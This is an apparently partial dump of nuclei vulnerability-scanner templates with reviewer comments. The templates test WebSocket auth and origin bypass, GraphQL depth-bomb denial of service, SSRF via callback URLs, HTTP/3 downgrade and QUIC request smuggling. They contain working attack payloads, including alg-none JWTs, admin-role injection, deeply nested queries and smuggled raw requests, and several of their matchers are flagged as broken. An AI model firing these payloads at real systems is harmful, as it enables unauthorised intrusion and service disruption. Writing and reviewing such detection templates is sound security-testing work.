"{{callback_url}}", 47 | "allowed_origins": ["{{callback_url}}"], 48 | "callback_url": "{{callback_url}}/validated" 49 | } 50 | 51 | - address: "{{BaseURL}}" 52 | path: 53 | - "/ws" 54 | - "/websocket" 55 | - "/socket.io/" 56 | - "/api/ws" 57 | 58 | headers: 59 | Origin: "null" 60 | X-Forwarded-Host: "{{callback_url}}" 61 | X-Original-URL: "{{callback_url}}/websocket" 62 | 63 | inputs: 64 | - data: | 65 | { 66 | "type": "null_origin_bypass", 67 | "forwarded_host": "{{callback_url}}", 68 | "callback_url": "{{callback_url}}/null-origin" 69 | } 70 | 71 | - address: "{{BaseURL}}" 72 | path: 73 | - "/ws" 74 | - "/websocket" 75 | - "/socket.io/" 76 | - "/api/ws" 77 | 78 | headers: 79 | Origin: "{{Hostname}}.{{callback_url}}" 80 | Host: "{{callback_url}}" 81 | 82 | inputs: 83 | - data: | 84 | { 85 | "type": "subdomain_bypass", 86 | "spoofed_origin": "{{Hostname}}.{{callback_url}}", 87 | "callback_url": "{{callback_url}}/subdomain-bypass" 88 | } 89 | - data: | 90 | { 91 | "action": "cors_bypass", 92 | "bypass_origin": "{{callback_url}}", 93 | "trusted_domain": "{{callback_url}}", 94 | "redirect_callback": "{{callback_url}}/cors-success" 95 | } 96 | 97 | matchers: 98 | - type: word 99 | part: interactsh_protocol 100 | words: 101 | - "http" 102 | - "dns" 103 | condition: or -------------------------------------------------------------------------------- /graphql-depth-bomb.yaml: -------------------------------------------------------------------------------- 1 | id: graphql-depth-bomb 2 | info: 3 | name: GraphQL Query Depth Attack Detection 4 | author: geeknik 5 | severity: high 6 | description: | 7 | Detects GraphQL endpoints vulnerable to query depth attacks that can cause 8 | denial of service through excessive nested queries and resource exhaustion. 
reference:
  - https://www.apollographql.com/blog/graphql/security/securing-your-graphql-api-from-malicious-queries/
  - https://portswigger.net/web-security/graphql
classification:
  cwe-id: CWE-400
tags: graphql,dos,api,depth-attack
metadata:
  # REVIEW: four request blocks x four paths = 16 requests per target; nuclei's
  # validation counts every path, so this should read 16 (confirm with
  # `nuclei -validate`).
  max-request: 4

variables:
  depth_id: "{{randstr}}"

requests:
  # Trivial query tagged with a random operation name. It cannot hit the
  # rejection-message matcher, so at best it acts as a latency control for the
  # `duration >= 5` rule below.
  - method: POST
    path:
      - "{{BaseURL}}/graphql"
      - "{{BaseURL}}/api/graphql"
      - "{{BaseURL}}/v1/graphql"
      - "{{BaseURL}}/query"

    headers:
      Content-Type: application/json

    body: |
      {
        "query": "query DepthTest{{depth_id}} { __typename }"
      }

  # Depth-13 nesting over guessed field names; a schema without user/posts/
  # comments answers with a validation error at no cost.
  - method: POST
    path:
      - "{{BaseURL}}/graphql"
      - "{{BaseURL}}/api/graphql"
      - "{{BaseURL}}/v1/graphql"
      - "{{BaseURL}}/query"

    headers:
      Content-Type: application/json

    body: |
      {
        "query": "query { user { posts { comments { author { posts { comments { author { posts { comments { author { posts { comments { text } } } } } } } } } } } } }"
      }

  # REVIEW: this query appears to open 13 braces and close 12 — if so it is a
  # parse error, the server answers immediately, and no depth is exercised.
  # Recount before relying on it.
  - method: POST
    path:
      - "{{BaseURL}}/graphql"
      - "{{BaseURL}}/api/graphql"
      - "{{BaseURL}}/v1/graphql"
      - "{{BaseURL}}/query"

    headers:
      Content-Type: application/json

    body: |
      {
        "query": "query { node(id: 1) { ... on User { friends { friends { friends { friends { friends { friends { friends { friends { friends { friends { name } } } } } } } } } } } }"
      }

  # Fragment cycles are rejected during validation by spec-compliant servers,
  # so this measures the validator, not query execution.
  - method: POST
    path:
      - "{{BaseURL}}/graphql"
      - "{{BaseURL}}/api/graphql"
      - "{{BaseURL}}/v1/graphql"
      - "{{BaseURL}}/query"

    headers:
      Content-Type: application/json

    body: |
      {
        "query": "fragment Recursive on User { name posts { comments { author { ...Recursive } } } } query { user { ...Recursive } }"
      }

    stop-at-first-match: true

    # REVIEW: the logic is inverted. The word matcher fires on the server's
    # *rejection* messages ("depth limit", "max query depth", ...), i.e. on
    # exactly the servers that enforce a depth limit, and with
    # `matchers-condition: or` that alone reports a finding. Those strings belong
    # in a `negative: true` matcher (or a separate info-level "limit enforced"
    # template); the only evidence of an executed deep query here is the
    # `duration >= 5 && status_code == 200` rule.
    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "Query depth limit exceeded"
          - "max query depth"
          - "query is too complex"
          - "Query complexity"
          - "depth limit"
          - "Maximum query depth"

      - type: dsl
        dsl:
          - "duration >= 5"
          - "status_code == 200"
        condition: and

      # REVIEW: 429/503 are rate-limit / overload replies that a shared target may
      # return for reasons unrelated to this probe; treat as weak evidence at most.
      - type: status
        status:
          - 503
          - 429

    extractors:
      - type: regex
        part: body
        regex:
          - 'depth["\s:]+(\d+)'
          - 'complexity["\s:]+(\d+)'
          - 'cost["\s:]+(\d+)'
--------------------------------------------------------------------------------
/websocket-auth-bypass-real.yaml:
--------------------------------------------------------------------------------
id: websocket-auth-bypass-real

info:
  name: WebSocket Authentication Bypass with Real Connection Testing
  author: geeknik
  severity: critical
  description: |
    Detects ACTUAL WebSocket authentication bypasses by establishing real WebSocket
    connections and testing various authentication bypass techniques including
    missing origin validation, token manipulation, and protocol downgrade.
reference:
  - https://portswigger.net/web-security/websockets
  - https://tools.ietf.org/html/rfc6455
classification:
  cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
  cvss-score: 9.3
  cwe-id: CWE-287,CWE-346
tags: websocket,auth-bypass,critical,real

variables:
  callback: "{{interactsh-url}}"
  bypass_id: "{{randstr}}"

websocket:
  # REVIEW: the scheme is hard-coded (`ws://` here, `wss://` in the second block)
  # instead of following the target; the other websocket templates in this set
  # use `{{BaseURL}}`. An https-only target never receives this block, and a
  # plaintext-only one never receives the second.
  - address: "ws://{{Hostname}}/ws"

    inputs:
      # Test 1: No authentication
      - data: '{"type":"connect","user":"admin"}'

      # Test 2: Empty token
      - data: '{"type":"auth","token":""}'

      # Test 3: Null token
      - data: '{"type":"auth","token":null}'

      # Test 4: Admin role injection
      - data: '{"type":"login","user":"guest","role":"admin"}'

      # Test 5: JWT none algorithm
      - data: '{"type":"auth","jwt":"eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9."}'

      # Test 6: Origin bypass callback
      # Only this input carries a unique marker; a callback for any of the other
      # five cannot be attributed to them.
      - data: '{"type":"validate","callback":"{{callback}}/ws-{{bypass_id}}"}'

    matchers-condition: or
    matchers:
      # Value-qualified substrings (`"authenticated":true`) — the right shape;
      # compare with the bare words used in the second block below.
      - type: word
        part: response
        words:
          - '"authenticated":true'
          - '"role":"admin"'
          - '"success":true'
          - 'Welcome admin'

      # REVIEW: a DNS-only interaction shows the host resolved the callback name,
      # not that authentication was bypassed; with `matchers-condition: or` it is
      # enough for a critical finding on its own.
      - type: word
        part: interactsh_protocol
        words:
          - "http"
          - "dns"

  - address: "wss://{{Hostname}}/ws"
    # REVIEW: this points the Origin at a third-party domain the tester does not
    # control; the `callback` variable defined above should be used instead so a
    # hit is attributable. Also confirm `origin` is a key nuclei's websocket
    # request accepts — websocket-origin-bypass-oob.yaml in this set sets Origin
    # via `headers:`; `nuclei -validate` will tell.
    origin: "https://evil.com"

    inputs:
      # Test origin validation bypass
      - data: '{"type":"connect","origin":"evil.com"}'

    matchers:
      # REVIEW: bare substrings — `{"authenticated":false}` or a rejection text
      # that contains "connected" match too. Use the value-qualified forms from
      # the first block. `negative: false` is the default and can go.
      - type: word
        part: response
        words:
          - "connected"
          - "authenticated"
        negative: false

  - address: "ws://{{Hostname}}/socket.io/?transport=websocket"

    inputs:
      # Socket.IO specific bypass
      - data: '42["authenticate",{"token":"bypass","admin":true}]'
      - data: '42["join",{"room":"admin","bypass":true}]'

    matchers:
      - type: regex
        part: response
        # REVIEW: as far as I recall the Engine.IO open packet (`0{"sid":...}`)
        # is sent to every client before any message is processed, so the
        # `"sid"` regex matches every Socket.IO server regardless of the two
        # messages above. And `43` is the ACK packet type, whose acks carry the
        # event id (`43<id>[...]`) that these un-numbered emits never request; a
        # server-emitted event would arrive as `42["authenticated",...]`. Confirm
        # against the Socket.IO protocol docs before keeping either pattern.
        regex:
          - '43\["authenticated"'
          - '"sid":"[a-zA-Z0-9]+"'

  - address: "ws://{{Hostname}}/graphql-ws"

    inputs:
      # GraphQL subscription bypass
      - data: '{"type":"connection_init","payload":{"authorization":""}}'
      - data: '{"type":"start","payload":{"query":"subscription { adminData }"}}'

    matchers:
      # `connection_ack` is the normal reply to any connection_init; alone it shows
      # that no auth is enforced at the transport handshake, which may be by design.
      # `"data":` depends on an `adminData` subscription field that is a guess.
      - type: word
        part: response
        words:
          - "connection_ack"
          - '"data":'
--------------------------------------------------------------------------------
/websocket-subscription-oob.yaml:
--------------------------------------------------------------------------------
id: websocket-subscription-oob

info:
  name: WebSocket Subscription Callback OOB Detection
  author: geeknik
  severity: medium
  description: |
    Detects WebSocket endpoints that support event subscriptions with external callback URLs,
    potentially leading to SSRF through subscription webhooks, event notifications, or
    real-time data streaming to external endpoints.
11 | reference: 12 | - https://developer.mozilla.org/en-US/docs/Web/API/WebSockets_API 13 | - https://socket.io/docs/v4/ 14 | - https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking 15 | classification: 16 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N 17 | cvss-score: 5.5 18 | cwe-id: CWE-918 19 | tags: websocket,oob,ssrf,subscription,callback,events 20 | 21 | variables: 22 | callback_url: "{{interactsh-url}}" 23 | 24 | websocket: 25 | - address: "{{BaseURL}}" 26 | path: 27 | - "/ws" 28 | - "/websocket" 29 | - "/socket.io/" 30 | - "/api/ws" 31 | - "/realtime" 32 | 33 | inputs: 34 | - data: | 35 | { 36 | "type": "subscribe", 37 | "event": "user.update", 38 | "callback_url": "{{callback_url}}/webhook", 39 | "webhook": "{{callback_url}}/events" 40 | } 41 | - data: | 42 | { 43 | "action": "notification_config", 44 | "config": { 45 | "endpoint": "{{callback_url}}/notify", 46 | "events": ["message", "connect", "disconnect"], 47 | "format": "json" 48 | } 49 | } 50 | - data: | 51 | { 52 | "command": "webhook_setup", 53 | "webhook_url": "{{callback_url}}/callback", 54 | "events": ["*"], 55 | "retry_failed": true, 56 | "external_webhook": "{{callback_url}}/external" 57 | } 58 | 59 | - address: "{{BaseURL}}" 60 | path: 61 | - "/ws/stream" 62 | - "/websocket/feed" 63 | - "/api/ws/live" 64 | 65 | inputs: 66 | - data: | 67 | { 68 | "type": "stream_config", 69 | "destination": "{{callback_url}}/stream", 70 | "format": "json", 71 | "real_time": true, 72 | "callback_on_error": "{{callback_url}}/error" 73 | } 74 | 75 | - address: "{{BaseURL}}" 76 | path: 77 | - "/ws/integration" 78 | - "/websocket/external" 79 | - "/api/ws/third-party" 80 | 81 | inputs: 82 | - data: | 83 | { 84 | "type": "integration", 85 | "integration": { 86 | "type": "webhook", 87 | "url": "{{callback_url}}/integration", 88 | "auth_callback": "{{callback_url}}/auth", 89 | "data_endpoint": "{{callback_url}}/data" 90 | } 91 | } 92 | - data: | 93 | { 94 | "action": 
"external_subscription", 95 | "external_url": "{{callback_url}}/subscribe", 96 | "callback_events": ["all"] 97 | } 98 | 99 | matchers: 100 | - type: word 101 | part: interactsh_protocol 102 | words: 103 | - "http" 104 | - "dns" 105 | condition: or -------------------------------------------------------------------------------- /http3-protocol-downgrade-attack.yaml: -------------------------------------------------------------------------------- 1 | id: http3-protocol-downgrade-attack 2 | 3 | info: 4 | name: HTTP/3 to HTTP/2 Protocol Downgrade Attack Detection 5 | author: geeknik 6 | severity: medium 7 | description: | 8 | Detects servers vulnerable to HTTP/3 to HTTP/2 protocol downgrade attacks 9 | where malicious clients can force fallback to HTTP/2 for exploitation of 10 | HTTP/2-specific vulnerabilities while maintaining HTTP/3 session context. 11 | Tests Alt-Svc header manipulation and QUIC connection degradation vectors. 12 | reference: 13 | - https://tools.ietf.org/html/rfc9114 14 | - https://datatracker.ietf.org/doc/html/rfc7838 15 | - https://datatracker.ietf.org/doc/html/rfc9000 16 | - https://blog.cloudflare.com/http-3-the-past-present-and-future/ 17 | classification: 18 | cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N 19 | cvss-score: 4.8 20 | cwe-id: CWE-757,CWE-693 21 | tags: http3,http2,protocol-downgrade,quic,alt-svc,tls 22 | 23 | variables: 24 | callback_url: "{{interactsh-url}}" 25 | downgrade_id: "{{randstr}}" 26 | 27 | http: 28 | - method: GET 29 | path: 30 | - "{{BaseURL}}/" 31 | - "{{BaseURL}}/api/" 32 | - "{{BaseURL}}/secure/" 33 | - "{{BaseURL}}/admin/" 34 | 35 | headers: 36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 37 | Alt-Used: "{{callback_url}}" 38 | Alt-Svc: 'h3=":443"; ma=86400, h2=":443"; ma=86400' 39 | HTTP2-Settings: "AAMAAABkAARAAAAAAAIAAAAA" 40 | Connection: "HTTP2-Settings, Upgrade, close" 41 | Upgrade: "h2c" 42 | 43 | matchers-condition: and 44 | matchers: 45 | - type: word 46 | part: 
header 47 | words: 48 | - "alt-svc" 49 | - "Alt-Svc" 50 | condition: or 51 | case-insensitive: true 52 | 53 | - type: word 54 | part: header 55 | words: 56 | - "h3=" 57 | - "h2=" 58 | condition: or 59 | case-insensitive: true 60 | 61 | - type: status 62 | status: 63 | - 101 64 | - 426 65 | condition: or 66 | 67 | - method: GET 68 | path: 69 | - "{{BaseURL}}/.well-known/alt-svc" 70 | - "{{BaseURL}}/.well-known/quic-alt-svc" 71 | 72 | headers: 73 | Accept: application/json 74 | User-Agent: "HTTP3-Downgrade-Test/1.0" 75 | 76 | matchers: 77 | - type: word 78 | part: body 79 | words: 80 | - "quic" 81 | - "h3-" 82 | - "h2" 83 | condition: and 84 | case-insensitive: true 85 | 86 | - method: POST 87 | path: 88 | - "{{BaseURL}}/api/version" 89 | - "{{BaseURL}}/protocol/negotiate" 90 | 91 | headers: 92 | Content-Type: "application/json" 93 | Alt-Svc-Clear: "1" 94 | 95 | body: | 96 | { 97 | "protocol_versions": ["h3", "h2", "http/1.1"], 98 | "force_downgrade": true, 99 | "callback_url": "{{callback_url}}/protocol-{{downgrade_id}}" 100 | } 101 | 102 | matchers: 103 | - type: word 104 | part: interactsh_protocol 105 | words: 106 | - "http" 107 | - "dns" 108 | condition: or 109 | 110 | extractors: 111 | - type: regex 112 | part: header 113 | regex: 114 | - "alt-svc:\\s*([^\\r\\n]+)" 115 | group: 1 -------------------------------------------------------------------------------- /graphql-subscription-oob.yaml: -------------------------------------------------------------------------------- 1 | id: graphql-subscription-oob 2 | 3 | info: 4 | name: GraphQL Subscription OOB Callback Detection 5 | author: geeknik 6 | severity: medium 7 | description: | 8 | Detects GraphQL endpoints that support subscriptions with external callback URLs, 9 | potentially leading to SSRF via subscription webhook notifications or schema fetching. 
reference:
  - https://graphql.org/blog/subscriptions-in-graphql-and-relay/
  - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery
classification:
  cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
  cvss-score: 5.8
  cwe-id: CWE-918
tags: graphql,oob,ssrf,subscription,callback

variables:
  # REVIEW: `{{interactsh-url}}` expands to a bare hostname. The `String!`
  # arguments below receive it without a scheme; a resolver that parses the value
  # as a URL rejects it before making any request. Prefix `http://`.
  callback_url: "{{interactsh-url}}"

http:
  # REVIEW: `__schema` is only reachable from the query root; sent as a
  # `subscription` operation, spec-compliant servers answer with a validation
  # error, so the `subscriptionType`/`fields` matcher below almost never fires.
  # Use `query { __schema { subscriptionType { ... } } }`. And once it does fire
  # it is reported as a CWE-918 finding on its own — nuclei evaluates each
  # request's matchers independently — although introspection success is not an
  # SSRF. Either drop these matchers or chain the requests (`flow` /
  # `req-condition`) so the callback requests depend on it.
  - method: POST
    path:
      - "{{BaseURL}}/graphql"
      - "{{BaseURL}}/api/graphql"
      - "{{BaseURL}}/v1/graphql"
      - "{{BaseURL}}/query"

    headers:
      Content-Type: application/json
      Accept: application/json

    body: |
      {
        "query": "subscription { __schema { subscriptionType { fields { name description args { name type { name } } } } } }",
        "variables": {}
      }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"subscriptionType"'
          - '"fields"'
        condition: and

      - type: status
        status:
          - 200

  # REVIEW: this item and the CreateSubscription item that follows have no
  # `matchers:` block; only the final ImportSchema item carries the interactsh
  # matcher. A callback triggered by these two mutations is therefore never
  # reported. Give each item the interactsh matcher (or fold all three into one
  # item). `registerWebhook` / `createSubscription` are also guessed operation
  # names — the introspection reply above could supply real ones, but nothing is
  # extracted from it.
  - method: POST
    path:
      - "{{BaseURL}}/graphql"
      - "{{BaseURL}}/api/graphql"
      - "{{BaseURL}}/v1/graphql"
      - "{{BaseURL}}/query"

    headers:
      Content-Type: application/json
      Accept: application/json

    body: |
      {
        "query": "mutation RegisterWebhook($url: String!) { registerWebhook(callbackUrl: $url) { id status } }",
        "variables": {
          "url": "{{callback_url}}"
        }
      }

  - method: POST
    path:
      - "{{BaseURL}}/graphql"
      - "{{BaseURL}}/api/graphql"
      - "{{BaseURL}}/v1/graphql"
      - "{{BaseURL}}/query"

    headers:
      Content-Type: application/json
      Accept: application/json

    body: |
      {
        "query": "mutation CreateSubscription($callback: String!) 
{ createSubscription(webhookUrl: $callback) { subscriptionId } }", 86 | "variables": { 87 | "callback": "{{callback_url}}" 88 | } 89 | } 90 | 91 | - method: POST 92 | path: 93 | - "{{BaseURL}}/graphql" 94 | - "{{BaseURL}}/api/graphql" 95 | - "{{BaseURL}}/v1/graphql" 96 | - "{{BaseURL}}/query" 97 | 98 | headers: 99 | Content-Type: application/json 100 | Accept: application/json 101 | 102 | body: | 103 | { 104 | "query": "mutation ImportSchema($url: String!) { importSchema(schemaUrl: $url) { success errors } }", 105 | "variables": { 106 | "url": "{{callback_url}}/schema.graphql" 107 | } 108 | } 109 | 110 | matchers: 111 | - type: word 112 | part: interactsh_protocol 113 | words: 114 | - "http" 115 | - "dns" 116 | condition: or 117 | -------------------------------------------------------------------------------- /http3-quic-smuggling.yaml: -------------------------------------------------------------------------------- 1 | id: http3-quic-smuggling 2 | 3 | info: 4 | name: HTTP/3 QUIC Request Smuggling Detection 5 | author: geeknik 6 | severity: critical 7 | description: | 8 | Detects ACTUAL HTTP/3 request smuggling vulnerabilities by exploiting 9 | differences in HTTP/3 to HTTP/2 translation at reverse proxies. Tests 10 | for stream confusion, header injection, and protocol downgrade attacks 11 | that lead to request smuggling. 
12 | reference: 13 | - https://portswigger.net/research/http3-connection-contamination 14 | - https://www.blackhat.com/us-23/briefings/schedule/#http3-quic-attacks 15 | classification: 16 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L 17 | cvss-score: 9.0 18 | cwe-id: CWE-444 19 | tags: http3,quic,smuggling,critical 20 | 21 | variables: 22 | smuggle_id: "{{randstr}}" 23 | callback: "{{interactsh-url}}" 24 | 25 | http: 26 | # Test 1: HTTP/3 Alt-Svc downgrade smuggling 27 | - raw: 28 | - | 29 | GET / HTTP/1.1 30 | Host: {{Hostname}} 31 | Alt-Svc: clear 32 | Alt-Svc: h3-29=":443"; ma=0 33 | Connection: close 34 | 35 | - | 36 | GET /admin HTTP/1.1 37 | Host: {{Hostname}} 38 | X-HTTP3-Stream-ID: 0 39 | Transfer-Encoding: chunked 40 | Content-Length: 4 41 | 42 | 0 43 | 44 | GET /internal HTTP/1.1 45 | Host: internal.local 46 | X-Smuggled: {{smuggle_id}} 47 | 48 | unsafe: true 49 | 50 | matchers: 51 | - type: dsl 52 | dsl: 53 | - 'contains(body_2, "admin") || contains(body_2, "forbidden") || status_code_2 == 403' 54 | - 'contains(header_1, "alt-svc")' 55 | condition: and 56 | 57 | # Test 2: QUIC stream confusion attack 58 | - raw: 59 | - | 60 | GET / HTTP/3 61 | Host: {{Hostname}} 62 | :method: GET 63 | :path: / 64 | :scheme: https 65 | :authority: {{Hostname}} 66 | x-http3-stream-id: 1 67 | x-http3-stream-weight: 256 68 | 69 | - | 70 | GET /{{callback}}/http3-stream-{{smuggle_id}} HTTP/3 71 | Host: {{Hostname}} 72 | :method: GET 73 | :path: /admin 74 | :scheme: https 75 | :authority: internal.{{Hostname}} 76 | x-http3-stream-id: 1 77 | x-http3-stream-dependency: 0 78 | 79 | matchers-condition: or 80 | matchers: 81 | - type: word 82 | part: interactsh_protocol 83 | words: 84 | - "http" 85 | 86 | - type: dsl 87 | dsl: 88 | - 'status_code_2 != status_code_1 && status_code_2 == 200' 89 | 90 | # Test 3: HTTP/3 header injection via QPACK 91 | - raw: 92 | - | 93 | GET / HTTP/3 94 | Host: {{Hostname}} 95 | :method: GET 96 | :path: 
/?cb={{callback}}/qpack-{{smuggle_id}} 97 | :scheme: https 98 | :authority: {{Hostname}} 99 | :status: 200 100 | x-qpack-table-size: 4096 101 | x-qpack-blocked-streams: 100 102 | 103 | matchers: 104 | - type: word 105 | part: interactsh_protocol 106 | words: 107 | - "http" 108 | - "dns" 109 | 110 | # Test 4: Connection coalescing attack 111 | - raw: 112 | - | 113 | GET / HTTP/3 114 | Host: {{Hostname}} 115 | :method: CONNECT 116 | :authority: {{callback}}:443 117 | :scheme: https 118 | :protocol: websocket 119 | origin: https://{{Hostname}} 120 | 121 | matchers: 122 | - type: word 123 | part: interactsh_protocol 124 | words: 125 | - "http" 126 | - "dns" --------------------------------------------------------------------------------